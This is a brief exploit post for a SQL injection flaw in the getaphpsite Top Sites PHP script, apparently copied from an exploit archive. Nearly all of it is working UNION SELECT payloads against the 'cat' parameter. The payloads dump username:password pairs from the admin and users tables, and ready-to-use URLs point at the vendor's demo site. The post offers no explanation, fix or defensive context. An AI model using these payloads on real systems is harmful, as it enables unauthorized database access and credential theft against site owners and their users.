getaphpsite Top Sites (cat) Remote Sql inj

getaphpsite Top Sites (cat) Remote Sql inj

link: http://packetstormsecurity.org/0812-exploits/topsites-sql.txt

link: http://www.exploiter5.com/all.php?id=60

Exploit:

http://z0rlu.blogspot.com/script/category.php?cat=[SQL1] or [SQL2]

[SQL1]=

3+union+select+1,concat(username,0x3a,password),3,4,5+from+admin

[SQL2]=

3+union+select+1,concat(username,0x3a,password),3,4,5+from+users

for demo:

http://www.getaphpsite.com/demos/topsites/category.php?cat=3+union+select+1,concat(username,0x3a,password),3,4,5+from+admin

or

http://www.getaphpsite.com/demos/topsites/category.php?cat=3+union+select+1,concat(username,0x3a,password),3,4,5+from+users